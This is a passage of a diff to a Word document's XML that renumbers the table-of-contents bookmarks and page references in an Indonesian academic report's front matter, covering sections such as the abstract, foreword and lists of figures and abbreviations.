             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc43426517" w:history="1">
+          <w:bookmarkStart w:id="20" w:name="_GoBack"/>
+          <w:bookmarkEnd w:id="20"/>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:instrText>HYPERLINK \l "_Toc43427684"</w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:t>LEMBAR PENGESAHAN</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:tab/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:instrText xml:space="preserve"> PAGEREF _Toc43427684 \h </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:t>i</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+              <w:webHidden/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:noProof/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc43427685" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>LEMBAR PENGESAHAN</w:t>
+                <w:lang w:val="id-ID"/>
+              </w:rPr>
+              <w:t>LEMBAR PERNYATAAN ORISINALITAS</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4181,7 +4297,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426517 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427685 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4201,7 +4317,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>1</w:t>
+              <w:t>ii</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4226,14 +4342,14 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426518" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427686" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
                 <w:lang w:val="id-ID"/>
               </w:rPr>
-              <w:t>LEMBAR PERNYATAAN ORISINALITAS</w:t>
+              <w:t>ABSTRAK</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4254,7 +4370,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426518 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427686 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4274,7 +4390,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>1</w:t>
+              <w:t>iii</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4299,14 +4415,14 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426519" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427687" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
                 <w:lang w:val="id-ID"/>
               </w:rPr>
-              <w:t>ABSTRAK</w:t>
+              <w:t>ABSTRACT</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4327,7 +4443,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426519 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427687 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4347,7 +4463,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>iv</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4372,14 +4488,13 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426520" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427688" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="id-ID"/>
-              </w:rPr>
-              <w:t>ABSTRACT</w:t>
+              </w:rPr>
+              <w:t>KATA PENGANTAR</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4400,7 +4515,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426520 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427688 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4420,7 +4535,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>v</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4445,13 +4560,13 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426521" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427689" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>KATA PENGANTAR</w:t>
+              <w:t>DAFTAR ISI</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4472,7 +4587,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426521 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427689 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4492,7 +4607,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>vi</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4517,13 +4632,13 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426522" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427690" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>DAFTAR ISI</w:t>
+              <w:t>DAFTAR GAMBAR DAN ILUSTRASI</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4544,7 +4659,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426522 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427690 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4564,7 +4679,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>6</w:t>
+              <w:t>ix</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4589,13 +4704,13 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426523" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427691" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>DAFTAR GAMBAR DAN ILUSTRASI</w:t>
+              <w:t>DAFTAR TABEL</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4616,7 +4731,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426523 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427691 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4636,7 +4751,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>9</w:t>
+              <w:t>xi</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4661,13 +4776,21 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426524" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427692" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>DAFTAR TABEL</w:t>
+              <w:t xml:space="preserve">DAFTAR </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="id-ID"/>
+              </w:rPr>
+              <w:t>ISTILAH</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4688,7 +4811,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426524 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427692 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4708,7 +4831,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>11</w:t>
+              <w:t>xii</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4733,7 +4856,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426525" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427693" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4747,7 +4870,7 @@
                 <w:noProof/>
                 <w:lang w:val="id-ID"/>
               </w:rPr>
-              <w:t>ISTILAH</w:t>
+              <w:t>SINGKATAN</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4768,7 +4891,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426525 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427693 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4788,87 +4911,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>12</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="7928"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426526" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-              </w:rPr>
-              <w:t xml:space="preserve">DAFTAR </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:noProof/>
-                <w:lang w:val="id-ID"/>
-              </w:rPr>
-              <w:t>SINGKATAN</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426526 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-              </w:rPr>
-              <w:t>14</w:t>
+              <w:t>xiv</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4894,7 +4937,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426527" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427694" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4946,7 +4989,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426527 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427694 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4966,7 +5009,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>1</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4992,7 +5035,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426528" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427695" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5036,7 +5079,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426528 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427695 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5056,7 +5099,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>1</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5082,7 +5125,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426529" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427696" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5126,7 +5169,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426529 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427696 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5146,7 +5189,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5172,7 +5215,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426530" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427697" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5216,7 +5259,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426530 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427697 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5236,7 +5279,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5262,7 +5305,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426531" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427698" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5306,7 +5349,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426531 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427698 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5326,7 +5369,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5352,7 +5395,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426532" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427699" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5396,7 +5439,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426532 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427699 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5416,7 +5459,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5442,7 +5485,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426533" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427700" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5486,7 +5529,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426533 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427700 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5506,7 +5549,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5532,7 +5575,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426534" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427701" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5576,7 +5619,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426534 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427701 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5596,7 +5639,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5622,7 +5665,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426535" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427702" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5670,7 +5713,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426535 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427702 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5690,7 +5733,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5716,7 +5759,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426536" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427703" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5762,7 +5805,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426536 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427703 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5782,7 +5825,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5808,7 +5851,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426537" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427704" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5860,7 +5903,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426537 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427704 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5880,7 +5923,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>19</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5906,7 +5949,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426538" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427705" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -5951,7 +5994,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426538 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427705 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5971,7 +6014,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>20</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -5997,7 +6040,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426539" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427706" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -6043,7 +6086,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426539 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427706 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6063,7 +6106,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>20</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6089,7 +6132,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426540" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427707" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -6133,7 +6176,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426540 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427707 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6153,7 +6196,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>21</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6179,7 +6222,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426541" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427708" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -6223,7 +6266,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426541 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427708 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6243,7 +6286,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>21</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6269,7 +6312,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426542" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427709" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -6321,7 +6364,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426542 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427709 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6341,7 +6384,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>21</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6367,7 +6410,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426543" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427710" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -6411,7 +6454,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc43426543 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc43427710 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6431,7 +6474,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6457,7 +6500,7 @@
               <w:lang w:val="en-ID" w:eastAsia="en-ID"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc43426544" w:history="1">
+          <w:hyperlink w:anchor="_Toc43427711" w:history="1">
             <w:r>
               <w:rPr>
